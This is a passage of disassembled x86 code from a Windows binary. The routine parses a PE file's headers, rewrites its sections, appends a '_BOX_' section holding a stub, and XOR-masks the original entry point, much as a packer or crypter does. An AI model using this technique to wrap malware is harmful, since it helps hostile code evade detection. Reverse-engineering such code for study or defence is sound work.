; START OF FUNCTION CHUNK FOR sub_4DABD7
loc_4DB128: ; CODE XREF: sub_4DABD7+54E�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_4DABD7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB13C proc near ; CODE XREF: sub_4D9DC0+23C�p
; sub_4D9DC0:loc_4DA01A�p
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_4E696C, 0
setnz al
pop ebp
retn
sub_4DB13C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB14D proc near ; CODE XREF: sub_4D9DC0:loc_4DA00A�p
; sub_4DB1E1:loc_4DC05C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_4DB153: ; CODE XREF: sub_4DB14D+89�j
and [ebp+var_4], 0
cmp ds:dword_4E696C, 0
jz short loc_4DB1D0
mov [ebp+var_8], offset dword_4E696C
loc_4DB167: ; CODE XREF: sub_4DB14D:loc_4DB1CE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_4DB1D0
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
push 0
push 1
mov eax, [ebp+var_C]
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_C]
push dword ptr [eax+8]
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_4D9D70
add esp, 18h
movzx eax, al
test eax, eax
jz short loc_4DB1C3
mov [ebp+var_4], 1
mov eax, [ebp+var_8]
mov eax, [eax]
mov ecx, [ebp+var_8]
mov eax, [eax+10h]
mov [ecx], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4DD3DD
pop ecx
jmp short loc_4DB1CE
; ---------------------------------------------------------------------------
loc_4DB1C3: ; CODE XREF: sub_4DB14D+52�j
mov eax, [ebp+var_8]
mov eax, [eax]
add eax, 10h
mov [ebp+var_8], eax
loc_4DB1CE: ; CODE XREF: sub_4DB14D+74�j
jmp short loc_4DB167
; ---------------------------------------------------------------------------
loc_4DB1D0: ; CODE XREF: sub_4DB14D+11�j
; sub_4DB14D+20�j
movzx eax, [ebp+var_4]
test eax, eax
jnz loc_4DB153
mov al, [ebp+var_4]
leave
retn
sub_4DB14D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DB1E1 proc near ; CODE XREF: sub_4DE31F+2F�p
; sub_4DFE2D+2D�p
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004DBB27 SIZE 00000058 BYTES
; FUNCTION CHUNK AT 004DBB8F SIZE 000004F6 BYTES
; FUNCTION CHUNK AT 004DC132 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E34C0
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_12C], edx
mov [ebp+var_128], ecx
or [ebp+var_3C], 0FFFFFFFFh
or [ebp+var_38], 0FFFFFFFFh
or [ebp+var_58], 0FFFFFFFFh
and [ebp+var_34], 0
and [ebp+var_30], 0
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_54], 0
and [ebp+var_4C], 0
and [ebp+var_50], 0
and [ebp+var_40], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
and [ebp+var_5C], 0
and [ebp+var_20], 0
push offset dword_4E6930
call ds:dword_4E66C4 ;; RtlEnterCriticalSection
and [ebp+var_48], 0
mov eax, ds:dword_4E6964
mov [ebp+var_44], eax
and [ebp+var_4], 0
push [ebp+var_128]
call ds:dword_4E6718 ;; GetModuleHandleA
test eax, eax
jz short loc_4DB2A9
push [ebp+var_128]
call ds:dword_4E675C ;; LoadLibraryA
push 0FFFFFFFFh
mov [ebp+var_130], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_130]
jmp loc_4DC132
; ---------------------------------------------------------------------------
loc_4DB2A9: ; CODE XREF: sub_4DB1E1+9C�j
push [ebp+var_12C]
lea eax, [ebp+var_24]
push eax
push [ebp+var_128]
call sub_4DA81E
add esp, 0Ch
mov [ebp+var_6C], eax
cmp ds:dword_4E6964, 0
jz short loc_4DB32D
cmp [ebp+var_6C], 0
jz short loc_4DB32D
mov eax, ds:dword_4E6964
mov [ebp+var_74], eax
jmp short loc_4DB2F1
; ---------------------------------------------------------------------------
loc_4DB2DD: ; CODE XREF: sub_4DB1E1:loc_4DB32B�j
mov eax, [ebp+var_74]
mov eax, [eax+4]
mov [ebp+var_74], eax
mov eax, ds:dword_4E6968
inc eax
mov ds:dword_4E6968, eax
loc_4DB2F1: ; CODE XREF: sub_4DB1E1+FA�j
cmp [ebp+var_74], 0
jz short loc_4DB32D
mov eax, [ebp+var_74]
mov eax, [eax]
cmp eax, [ebp+var_6C]
jnz short loc_4DB32B
mov eax, ds:dword_4E6968
inc eax
mov ds:dword_4E6968, eax
push 0FFFFFFFFh
and [ebp+var_134], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_134]
jmp loc_4DC132
; ---------------------------------------------------------------------------
loc_4DB32B: ; CODE XREF: sub_4DB1E1+11E�j
jmp short loc_4DB2DD
; ---------------------------------------------------------------------------
loc_4DB32D: ; CODE XREF: sub_4DB1E1+EA�j
; sub_4DB1E1+F0�j ...
and ds:dword_4E6968, 0
mov eax, [ebp+var_6C]
mov [ebp+var_48], eax
lea eax, [ebp+var_48]
mov ds:dword_4E6964, eax
cmp [ebp+var_6C], 0
jnz loc_4DB3CE
mov eax, [ebp+var_128]
mov [ebp+var_78], eax
push [ebp+var_12C]
push 0
push [ebp+var_78]
call ds:dword_4E6758 ;; LoadLibraryExA
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_4DB38E
mov eax, [ebp+var_12C]
and eax, 2
test eax, eax
jnz short loc_4DB3AD
push [ebp+var_128]
push [ebp+var_7C]
call sub_4DA070
test eax, eax
jnz short loc_4DB3AD
loc_4DB38E: ; CODE XREF: sub_4DB1E1+18C�j
call ds:dword_4E6710 ;; RtlGetLastWin32Error
test eax, eax
jnz short loc_4DB3A0
push 7Eh
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
loc_4DB3A0: ; CODE XREF: sub_4DB1E1+1B5�j
push [ebp+var_7C]
call ds:dword_4E66E0 ;; FreeLibrary
and [ebp+var_7C], 0
loc_4DB3AD: ; CODE XREF: sub_4DB1E1+199�j
; sub_4DB1E1+1AB�j
push 0FFFFFFFFh
mov eax, [ebp+var_7C]
mov [ebp+var_138], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_138]
jmp loc_4DC132
; ---------------------------------------------------------------------------
loc_4DB3CE: ; CODE XREF: sub_4DB1E1+165�j
push 0
push 0
push [ebp+var_6C]
call sub_4DD892
add esp, 0Ch
mov [ebp+var_28], eax
push [ebp+var_28]
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_80], eax
cmp [ebp+var_80], 0
jz short loc_4DB413
push 0FFFFFFFFh
mov eax, [ebp+var_80]
mov [ebp+var_13C], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_13C]
jmp loc_4DC132
; ---------------------------------------------------------------------------
loc_4DB413: ; CODE XREF: sub_4DB1E1+20F�j
mov eax, [ebp+var_24]
mov [ebp+var_84], eax
jmp short loc_4DB42B
; ---------------------------------------------------------------------------
loc_4DB41E: ; CODE XREF: sub_4DB1E1:loc_4DB44F�j
mov eax, [ebp+var_84]
inc eax
mov [ebp+var_84], eax
loc_4DB42B: ; CODE XREF: sub_4DB1E1+23B�j
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4DB451
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jnz short loc_4DB44F
mov eax, [ebp+var_84]
mov byte ptr [eax], 5Ch
loc_4DB44F: ; CODE XREF: sub_4DB1E1+263�j
jmp short loc_4DB41E
; ---------------------------------------------------------------------------
loc_4DB451: ; CODE XREF: sub_4DB1E1+255�j
push 0
lea eax, [ebp+var_3C]
push eax
push 0
push 0
push [ebp+var_24]
call sub_4D5346
test eax, eax
jnz short loc_4DB477
cmp [ebp+var_3C], 0
jnz short loc_4DB477
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB477: ; CODE XREF: sub_4DB1E1+284�j
; sub_4DB1E1+28A�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_3C]
call sub_4D5672
push 40h
call sub_4DD35A
pop ecx
mov [ebp+var_F4], eax
mov eax, [ebp+var_F4]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 40h
push [ebp+var_50]
push [ebp+var_3C]
call sub_4D6177
test eax, eax
jz short loc_4DB4B9
cmp [ebp+var_64], 0
jnz short loc_4DB4C3
loc_4DB4B9: ; CODE XREF: sub_4DB1E1+2D0�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB4C3: ; CODE XREF: sub_4DB1E1+2D6�j
push 0
push 0
mov eax, [ebp+var_50]
push dword ptr [eax+3Ch]
push [ebp+var_3C]
call sub_4D5421
push 0F8h
call sub_4DD35A
pop ecx
mov [ebp+var_F8], eax
mov eax, [ebp+var_F8]
mov [ebp+var_4C], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 0F8h
push [ebp+var_4C]
push [ebp+var_3C]
call sub_4D6177
test eax, eax
jz short loc_4DB511
cmp [ebp+var_64], 0
jnz short loc_4DB51B
loc_4DB511: ; CODE XREF: sub_4DB1E1+328�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB51B: ; CODE XREF: sub_4DB1E1+32E�j
mov eax, [ebp+var_4C]
cmp dword ptr [eax], 4550h
jz short loc_4DB530
mov ecx, 0EF00000Ch
call sub_4DD342
loc_4DB530: ; CODE XREF: sub_4DB1E1+343�j
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+18h]
sub eax, [ebp+var_4C]
mov ecx, [ebp+var_50]
mov ecx, [ecx+3Ch]
add ecx, eax
mov [ebp+var_70], ecx
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_70]
add ecx, eax
mov [ebp+var_68], ecx
mov [ebp+var_34], 600h
push [ebp+var_34]
call sub_4DD35A
pop ecx
mov [ebp+var_FC], eax
mov eax, [ebp+var_FC]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_34]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 200h
call sub_4DD35A
pop ecx
mov [ebp+var_100], eax
mov eax, [ebp+var_100]
mov [ebp+var_54], eax
mov ecx, 80h
mov eax, 90909090h
mov edi, [ebp+var_54]
rep stosd
push 0
push 0
push 0
push [ebp+var_3C]
call sub_4D5421
lea eax, [ebp+var_64]
push eax
push 0
push 0
push [ebp+var_68]
push [ebp+var_1C]
push [ebp+var_3C]
call sub_4D6177
test eax, eax
jz short loc_4DB5EA
cmp [ebp+var_64], 0
jnz short loc_4DB5F4
loc_4DB5EA: ; CODE XREF: sub_4DB1E1+401�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB5F4: ; CODE XREF: sub_4DB1E1+407�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
add ecx, [eax+3Ch]
mov [ebp+var_A0], ecx
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_A0]
lea eax, [ecx+eax+18h]
mov [ebp+var_90], eax
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_90]
add ecx, eax
mov [ebp+var_8C], ecx
mov eax, [ebp+var_A0]
add eax, 88h
mov [ebp+var_98], eax
mov eax, [ebp+var_A0]
add eax, 80h
mov [ebp+var_88], eax
mov eax, [ebp+var_A0]
and dword ptr [eax+24h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A0h]
mov [eax+34h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A4h]
mov [eax+38h], ecx
mov eax, [ebp+var_A0]
cmp dword ptr [eax+84h], 0
jz short loc_4DB6BF
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+80h]
mov [eax+3Ch], ecx
jmp short loc_4DB6C6
; ---------------------------------------------------------------------------
loc_4DB6BF: ; CODE XREF: sub_4DB1E1+4C8�j
mov eax, [ebp+var_54]
and dword ptr [eax+3Ch], 0
loc_4DB6C6: ; CODE XREF: sub_4DB1E1+4DC�j
mov eax, [ebp+var_54]
add eax, 40h
mov [ebp+var_94], eax
mov eax, [ebp+var_94]
and dword ptr [eax], 0
mov eax, [ebp+var_54]
add eax, 44h
mov [ebp+var_9C], eax
jmp short loc_4DB6F8
; ---------------------------------------------------------------------------
loc_4DB6E9: ; CODE XREF: sub_4DB1E1:loc_4DBC30�j
mov eax, [ebp+var_90]
add eax, 28h
mov [ebp+var_90], eax
loc_4DB6F8: ; CODE XREF: sub_4DB1E1+506�j
mov eax, [ebp+var_90]
cmp eax, [ebp+var_8C]
jnb loc_4DBC35
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+14h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+10h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+24h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
cmp ds:dword_4E6680, 2
jnb loc_4DB86E
mov eax, [ebp+var_90]
mov ecx, [ebp+var_98]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_4DB86E
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_98]
cmp eax, [ecx]
jbe loc_4DB86E
push 200h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
call sub_4DAAE5
pop ecx
pop ecx
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_4DD35A
pop ecx
mov [ebp+var_104], eax
mov eax, [ebp+var_104]
mov [ebp+var_2C], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_4DAAE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+20h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+20h], ecx
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_4D5421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_2C]
push [ebp+var_3C]
call sub_4D6177
test eax, eax
jz short loc_4DB846
cmp [ebp+var_64], 0
jnz short loc_4DB850
loc_4DB846: ; CODE XREF: sub_4DB1E1+65D�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB850: ; CODE XREF: sub_4DB1E1+663�j
mov eax, [ebp+var_90]
mov ecx, [ebp+var_34]
mov [eax+14h], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0C0000040h
jmp loc_4DBC30
; ---------------------------------------------------------------------------
loc_4DB86E: ; CODE XREF: sub_4DB1E1+590�j
; sub_4DB1E1+5A7�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_88]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_4DBB8F
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_88]
cmp eax, [ecx]
jbe loc_4DBB8F
and [ebp+var_A8], 0
mov [ebp+var_4], 1
push 4
push 1000h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push 0
call ds:dword_4E67A4 ;; VirtualAlloc
mov [ebp+var_A8], eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_4D5421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_A8]
push [ebp+var_3C]
call sub_4D6177
test eax, eax
jz short loc_4DB90F
cmp [ebp+var_64], 0
jnz short loc_4DB919
loc_4DB90F: ; CODE XREF: sub_4DB1E1+726�j
mov ecx, 0EF00000Fh
call sub_4DD342
loc_4DB919: ; CODE XREF: sub_4DB1E1+72C�j
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov [ebp+var_B0], eax
mov eax, [ebp+var_88]
mov eax, [eax]
sub eax, [ebp+var_B0]
mov ecx, [ebp+var_A8]
add ecx, eax
mov [ebp+var_AC], ecx
and [ebp+var_B4], 0
jmp short loc_4DB95A
; ---------------------------------------------------------------------------
loc_4DB94D: ; CODE XREF: sub_4DB1E1:loc_4DBB5A�j
mov eax, [ebp+var_B4]
inc eax
mov [ebp+var_B4], eax
loc_4DB95A: ; CODE XREF: sub_4DB1E1+76A�j
mov eax, [ebp+var_88]
mov eax, [eax+4]
xor edx, edx
push 14h
pop ecx
div ecx
cmp [ebp+var_B4], eax
jnb loc_4DBB5F
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
cmp dword ptr [ecx+eax+0Ch], 0
jnz short loc_4DB991
jmp loc_4DBB5F
; ---------------------------------------------------------------------------
loc_4DB991: ; CODE XREF: sub_4DB1E1+7A9�j
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
mov edx, [ebp+var_A8]
add edx, [ecx+eax+0Ch]
sub edx, [ebp+var_B0]
mov [ebp+var_BC], edx
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A8]
add ecx, [eax+10h]
cmp [ebp+var_BC], ecx
jbe short loc_4DB9D2
jmp loc_4DBB5F
; ---------------------------------------------------------------------------
loc_4DB9D2: ; CODE XREF: sub_4DB1E1+7EA�j
mov eax, [ebp+var_BC]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4DB9E4
jmp loc_4DBB5F
; ---------------------------------------------------------------------------
loc_4DB9E4: ; CODE XREF: sub_4DB1E1+7FC�j
and ds:dword_4E6968, 0
and [ebp+var_B8], 0
push [ebp+var_BC]
call sub_4DFE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz loc_4DBB27
cmp ds:dword_4E6968, 0
jz short loc_4DBA1E
jmp loc_4DBB29
; ---------------------------------------------------------------------------
loc_4DBA1E: ; CODE XREF: sub_4DB1E1+836�j
mov edi, [ebp+var_BC]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
push [ebp+var_24]
call sub_4DE2CA
pop ecx
pop ecx
mov [ebp+var_C0], eax
mov [ebp+var_4], 2
push 5Ch
push [ebp+var_C0]
call sub_4D1700
pop ecx
pop ecx
mov [ebp+var_C4], eax
cmp [ebp+var_C4], 0
jz short loc_4DBA72
mov eax, [ebp+var_C4]
inc eax
mov [ebp+var_C4], eax
jmp short loc_4DBA7E
; ---------------------------------------------------------------------------
loc_4DBA72: ; CODE XREF: sub_4DB1E1+880�j
mov eax, [ebp+var_C0]
mov [ebp+var_C4], eax
loc_4DBA7E: ; CODE XREF: sub_4DB1E1+88F�j
mov edi, [ebp+var_BC]
mov edx, [ebp+var_C4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push [ebp+var_C0]
call sub_4DFE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz short loc_4DBB00
cmp ds:dword_4E6968, 0
jz short loc_4DBAD9
push 1
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
jmp short loc_4DBB29
; ---------------------------------------------------------------------------
loc_4DBAD9: ; CODE XREF: sub_4DB1E1+8E7�j
push 7Eh
call ds:dword_4E678C ;; RtlRestoreLastWin32Error
push 0FFFFFFFFh
and [ebp+var_140], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_140]
jmp loc_4DC132
; ---------------------------------------------------------------------------
loc_4DBB00: ; CODE XREF: sub_4DB1E1+8DE�j
mov [ebp+var_4], 1
call sub_4DBB0E
jmp short loc_4DBB27
sub_4DB1E1 endp
; =============== S U B R O U T I N E =======================================
sub_4DBB0E proc near ; CODE XREF: sub_4DB1E1+926�p
; DATA XREF: _5:004E34E0�o
mov eax, [ebp-0C0h]
mov [ebp-108h], eax
push dword ptr [ebp-108h]
call sub_4DD3DD
pop ecx
retn
sub_4DBB0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4DB1E1
loc_4DBB27: ; CODE XREF: sub_4DB1E1+829�j
; sub_4DB1E1+92B�j
jmp short loc_4DBB2D
; ---------------------------------------------------------------------------
loc_4DBB29: ; CODE XREF: sub_4DB1E1+838�j
; sub_4DB1E1+8F6�j
mov [ebp+var_5C], 1
loc_4DBB2D: ; CODE XREF: sub_4DB1E1:loc_4DBB27�j
cmp [ebp+var_B8], 0
jz short loc_4DBB5A
mov eax, [ebp+var_94]
push dword ptr [eax]
push [ebp+var_B8]
push [ebp+var_BC]
call sub_4DA6EB
add esp, 0Ch
mov ecx, [ebp+var_94]
mov [ecx], eax
loc_4DBB5A: ; CODE XREF: sub_4DB1E1+953�j
jmp loc_4DB94D
; ---------------------------------------------------------------------------
loc_4DBB5F: ; CODE XREF: sub_4DB1E1+78F�j
; sub_4DB1E1+7AB�j ...
push 8000h
push 0
push [ebp+var_A8]
call ds:dword_4E67A8 ;; VirtualFree
and [ebp+var_A8], 0
and [ebp+var_4], 0
jmp short loc_4DBB8F
; END OF FUNCTION CHUNK FOR sub_4DB1E1
; =============== S U B R O U T I N E =======================================
sub_4DBB7F proc near ; DATA XREF: _5:004E34D0�o
push dword ptr [ebp-14h]
call sub_4DDC27
retn
sub_4DBB7F endp
; =============== S U B R O U T I N E =======================================
sub_4DBB88 proc near ; DATA XREF: _5:004E34D4�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
sub_4DBB88 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4DB1E1
loc_4DBB8F: ; CODE XREF: sub_4DB1E1+69E�j
; sub_4DB1E1+6BE�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_90]
mov eax, [eax+8]
cmp eax, [ecx+10h]
jbe short loc_4DBBB4
mov eax, [ebp+var_90]
mov eax, [eax+8]
mov [ebp+var_144], eax
jmp short loc_4DBBC3
; ---------------------------------------------------------------------------
loc_4DBBB4: ; CODE XREF: sub_4DB1E1+9C0�j
mov eax, [ebp+var_90]
mov eax, [eax+10h]
mov [ebp+var_144], eax
loc_4DBBC3: ; CODE XREF: sub_4DB1E1+9D1�j
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
push [ebp+var_144]
call sub_4DAAE5
pop ecx
pop ecx
mov ecx, [ebp+var_90]
mov [ecx+8], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_4DAAE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+24h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+24h], ecx
mov eax, [ebp+var_90]
and dword ptr [eax+10h], 0
mov eax, [ebp+var_90]
and dword ptr [eax+14h], 0
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000080h
loc_4DBC30: ; CODE XREF: sub_4DB1E1+688�j
jmp loc_4DB6E9
; ---------------------------------------------------------------------------
loc_4DBC35: ; CODE XREF: sub_4DB1E1+523�j
and [ebp+var_A4], 0
jmp short loc_4DBC4B
; ---------------------------------------------------------------------------
loc_4DBC3E: ; CODE XREF: sub_4DB1E1+A7C�j
; sub_4DB1E1+A87�j ...
mov eax, [ebp+var_A4]
inc eax
mov [ebp+var_A4], eax
loc_4DBC4B: ; CODE XREF: sub_4DB1E1+A5B�j
cmp [ebp+var_A4], 10h
jnb short loc_4DBC8E
cmp [ebp+var_A4], 0
jnz short loc_4DBC5F
jmp short loc_4DBC3E
; ---------------------------------------------------------------------------
loc_4DBC5F: ; CODE XREF: sub_4DB1E1+A7A�j
cmp [ebp+var_A4], 2
jnz short loc_4DBC6A
jmp short loc_4DBC3E
; ---------------------------------------------------------------------------
loc_4DBC6A: ; CODE XREF: sub_4DB1E1+A85�j
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+7Ch], 0
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+78h], 0
jmp short loc_4DBC3E
; ---------------------------------------------------------------------------
loc_4DBC8E: ; CODE XREF: sub_4DB1E1+A71�j
push 0Ah
pop ecx
xor eax, eax
mov edi, [ebp+var_90]
rep stosd
mov eax, [ebp+var_34]
add eax, [ebp+var_30]
mov ecx, [ebp+var_90]
mov [ecx+14h], eax
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+50h]
mov [eax+0Ch], ecx
mov esi, offset a_box_ ; "_BOX_"
mov edi, [ebp+var_90]
movsd
movsw
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+38h]
mov [eax+8], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+10h], 200h
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000020h
mov eax, [ebp+var_A0]
mov dword ptr [eax+3Ch], 200h
mov eax, [ebp+var_A0]
mov eax, [eax+50h]
mov ecx, [ebp+var_A0]
add eax, [ecx+38h]
mov ecx, [ebp+var_A0]
mov [ecx+50h], eax
mov eax, [ebp+var_A0]
mov eax, [eax+1Ch]
mov ecx, [ebp+var_A0]
add eax, [ecx+3Ch]
mov ecx, [ebp+var_A0]
mov [ecx+1Ch], eax
mov eax, [ebp+var_A0]
mov eax, [eax+28h]
mov [ebp+var_20], eax
push 5
pop ecx
mov esi, offset loc_4E5C70
mov edi, [ebp+var_54]
rep movsd
movsw
movsb
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+28h]
mov [eax+1], ecx
call sub_4DA8A0
mov ecx, [ebp+var_C8]
mov ecx, [ecx+1]
xor ecx, eax
mov eax, [ebp+var_C8]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
